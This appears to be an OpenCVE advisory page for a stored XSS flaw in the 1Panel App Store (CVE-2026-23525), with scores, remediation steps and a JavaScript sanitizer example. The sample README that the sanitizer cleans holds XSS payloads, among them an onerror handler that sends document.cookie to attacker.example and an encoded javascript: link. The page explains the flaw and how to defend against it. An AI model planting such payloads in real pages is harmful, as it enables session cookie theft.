Description
1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.
Published: 2026-01-18
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting enabling cookie theft and unauthorized system access
Action: Immediate Patch
AI Analysis

Impact

1Panel is an open‑source, web‑based control panel for Linux servers that includes an App Store for installing applications. A stored Cross‑Site Scripting vulnerability exists in the App Store when viewing application details. The flaw arises from insufficient sanitization of content rendered by the MdEditor component in previewOnly mode: the App Store renders an application's README without XSS protection, so any script embedded in it executes during rendering. An attacker who can publish an application, locally or remotely, can therefore place arbitrary script in its README; when a logged‑in user opens that application's details, the script runs in the victim's browser session. The result can be theft of session cookies and use of the panel's system functions with the victim's privileges, compromising confidentiality, integrity, and availability. The description also notes that the same unsanitized rendering path exists in system upgrade‑related components and is addressed by the same MdEditor sanitization.

Affected Systems

All releases of 1Panel up to and including v1.10.33‑lts (1.x LTS line) and v2.0.16 (2.x line) are affected; NVD records the product as cpe:2.3:a:fit2cloud:1panel. The vendor‑supplied fixed releases are v1.10.34‑lts and v2.0.17.

Risk and Exploitability

The CVSS 3.1 base score of 6.4 (Medium) comes from the vector CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H: impact is rated high on confidentiality, integrity and availability, but the score is held down by high attack complexity, the high privileges the attacker is assumed to hold (consistent with needing to publish an application to the App Store), and the user interaction required, since a logged‑in user has to open the malicious application's details. The EPSS estimate below 1% indicates a very low probability of exploitation in the wild, and the vulnerability is not listed in the CISA KEV catalog; the SSVC record in the history below likewise shows Exploitation: none and Automatable: no. Successful exploitation runs attacker‑controlled script in the victim's 1Panel browser session, which the description says can be used to steal session cookies and invoke system functions with the victim's privileges.

Generated by OpenCVE AI on April 18, 2026 at 19:06 UTC.

Remediation

Fixed releases v1.10.34‑lts and v2.0.17 are named in the description; no separate vendor workaround is documented.

OpenCVE Recommended Actions

  • Upgrade to v1.10.34‑lts (1.x LTS) or v2.0.17 (2.x), which add XSS sanitization to the MdEditor rendering path.
  • If an upgrade cannot be performed immediately, block the installation of new applications from the App Store, or disable the App Store feature, until the patch is applied. Viewing an application's details is the trigger, so in the meantime also restrict which accounts can publish applications and which users browse the App Store.
  • Confirm the fix by version, not by configuration: the sanitization lives in the MdEditor component's previewOnly rendering path, which ships compiled into 1Panel's web frontend and is not an operator‑facing setting, so a deployment is fixed only if it runs v1.10.34‑lts / v2.0.17 or later.
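The sanitization the description and the actions above call for, shown as an added example that is neither 1Panel's code nor the upstream patch: an allowlist sanitizer applied to the HTML a Markdown renderer produces from an application README (and, per the description, from the same rendering path in upgrade‑related components) before that HTML is assigned to the DOM. The tag and attribute allowlists, the function names and the constructed README are assumptions for the demo. In a real frontend the renderer's output would be handed to a maintained sanitizer such as DOMPurify; md-editor-v3, assumed here to be the MdEditor component in question, exposes a sanitize prop that takes exactly such a function.

```javascript
// Allowlist sanitizer for HTML produced from Markdown (an app README rendered
// by a markdown preview component) before it is assigned to the DOM. Added
// example, not 1Panel's code and not the upstream patch; allowlists, function
// names and the sample README are assumptions for the demo.

// Tags a README legitimately needs; anything else (script, svg, iframe, style,
// ...) is dropped and only its text content survives, as plain text.
const ALLOWED_TAGS = new Set(['p', 'br', 'hr', 'b', 'strong', 'i', 'em', 'code', 'pre',
  'blockquote', 'ul', 'ol', 'li', 'h1', 'h2', 'h3', 'h4', 'a', 'img',
  'table', 'thead', 'tbody', 'tr', 'th', 'td']);
// Attributes allowed per tag. on* handlers, style, srcdoc etc. are never listed.
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt', 'title']) };
// Tags whose body is discarded too, not just the tag itself.
const DROP_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'noscript', 'template']);

// Comments and start/end tags; text is whatever lies between matches.
const TOKEN_RE = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;
// attribute name, then optionally = "double", 'single' or unquoted value
const ATTR_RE = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
// Named entities attackers use to hide a scheme, plus the basic ones.
const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':', Tab: '\t', NewLine: '\n' };

// Decode entities as a browser would inside an attribute value, so
// `&#106;avascript:` cannot hide the scheme from the URL check.
function decodeEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex || dec) {
      const cp = parseInt(hex || dec, hex ? 16 : 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : m;
  });
}

// Accept http(s), mailto and scheme-less (relative/fragment) URLs only. Control
// characters are stripped first because browsers ignore them inside the scheme:
// `java<TAB>script:` is `javascript:`.
function isSafeUrl(decoded) {
  const url = decoded.replace(/[\u0000-\u0020\u007f]/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return !scheme || /^(https?|mailto)$/i.test(scheme[1]);
}

const escapeText = (s) => s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
const escapeAttr = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');

// Re-emit an allowed start tag with only its allowed, URL-checked attributes.
function rebuildTag(name, rawAttrs) {
  const allowed = ALLOWED_ATTRS[name] || new Set();
  let attrs = '';
  for (const a of rawAttrs.matchAll(ATTR_RE)) {
    const attrName = a[1].toLowerCase();
    if (!allowed.has(attrName)) continue;
    const value = decodeEntities(a[2] ?? a[3] ?? a[4] ?? '');
    if ((attrName === 'href' || attrName === 'src') && !isSafeUrl(value)) continue;
    attrs += ` ${attrName}="${escapeAttr(value)}"`;
  }
  return `<${name}${attrs}>`;
}

// Tokenize the rendered HTML and rebuild it from allowed parts only; output is
// re-serialized rather than copied through, so odd quoting cannot survive.
function sanitizeHtml(html) {
  let out = '';
  let last = 0;
  let dropUntil = null;  // set while inside a DROP_CONTENT element's body
  let m;
  TOKEN_RE.lastIndex = 0;
  while ((m = TOKEN_RE.exec(html)) !== null) {
    const text = html.slice(last, m.index);
    last = TOKEN_RE.lastIndex;
    if (!dropUntil) out += escapeText(text);
    const [token, rawName, rawAttrs] = m;
    if (rawName === undefined) continue;  // comment: dropped
    const name = rawName.toLowerCase();
    const closing = token.startsWith('</');
    if (dropUntil) {
      if (closing && name === dropUntil) dropUntil = null;
    } else if (!ALLOWED_TAGS.has(name)) {
      if (!closing && DROP_CONTENT.has(name)) dropUntil = name;
    } else {
      out += closing ? `</${name}>` : rebuildTag(name, rawAttrs);
    }
  }
  if (!dropUntil) out += escapeText(html.slice(last));
  return out;
}

// Constructed sample: a malicious README after the Markdown renderer has run.
// Most Markdown renderers pass raw HTML through unchanged, which is how the
// payloads reach the preview.
const RENDERED_README = [
  '<h1>My App</h1>',
  '<p>Install with <code>docker compose up</code>.</p>',
  '<img src="x" onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  '<a href="&#106;avascript:alert(document.domain)">Docs</a>',
  '<script>alert(1)</script>',
].join('\n');

// Vulnerable: preview.innerHTML = RENDERED_README
// Fixed:      preview.innerHTML = sanitizeHtml(RENDERED_README)
function demo() {
  return sanitizeHtml(RENDERED_README);
}

console.log(demo());
```

Two details in the sample carry most of the weight. Attribute values are entity‑decoded and stripped of control characters before the scheme check, because the browser does the same, so `&#106;avascript:` and `java&Tab;script:` both have to be recognised as `javascript:`. Disallowed tags are removed rather than escaped, and the bodies of script and style elements are discarded, so a `<script>` with no closing tag cannot drag the rest of the README into an executable context.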

Generated by OpenCVE AI on April 18, 2026 at 19:06 UTC.


Advisories

No advisories yet.

History

Fri, 13 Mar 2026 14:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared  (none)           Fit2cloud; Fit2cloud 1panel
CPEs                 (none)           cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
Vendors & Products   (none)           Fit2cloud; Fit2cloud 1panel

Tue, 20 Jan 2026 21:15:00 +0000

Type     Values Removed   Values Added
Metrics  (none)           ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Mon, 19 Jan 2026 09:45:00 +0000

Type                 Values Removed   Values Added
First Time appeared  (none)           1panel; 1panel 1panel
Vendors & Products   (none)           1panel; 1panel 1panel

Sun, 18 Jan 2026 22:30:00 +0000

Type         Values Removed   Values Added
Description  (none)           1Panel is an open-source, web-based control panel for Linux server management. A stored Cross-Site Scripting (XSS) vulnerability exists in the 1Panel App Store when viewing application details. Malicious scripts can execute in the context of the user’s browser, potentially compromising session data or sensitive system interfaces. All versions of 1Panel up to and including v1.10.33-lts and v2.0.16 are affected. An attacker could publish a malicious application that, when loaded by users (locally or remotely), can execute arbitrary scripts. This may result in theft of user cookies, unauthorized access to system functions, or other actions that compromise the confidentiality, integrity, and availability of the system. The vulnerability is caused by insufficient sanitization of content rendered by the MdEditor component with the `previewOnly` attribute enabled. Specifically, the App Store renders application README content without proper XSS protection, allowing script execution during content rendering; and similar issues exist in system upgrade-related components, which can be fixed by implementing proper XSS sanitization in the MdEditor component. These vulnerabilities can be mitigated by applying proper XSS protection and sanitization when rendering content in the MdEditor component. Safe versions with a patch incorporated are v1.10.34-lts and v2.0.17.
Title        (none)           1panel App Store vulnerable to Cross-site Scripting
Weaknesses   (none)           CWE-79
References   (none)           (none)
Metrics      (none)           cvssV3_1 {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-01-20T20:07:16.229Z

Reserved: 2026-01-13T18:22:43.980Z

Link: CVE-2026-23525

Vulnrichment

Updated: 2026-01-20T20:02:47.910Z

NVD

Status : Analyzed

Published: 2026-01-18T23:15:48.220

Modified: 2026-03-13T14:29:08.653

Link: CVE-2026-23525

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T19:15:10Z

Weaknesses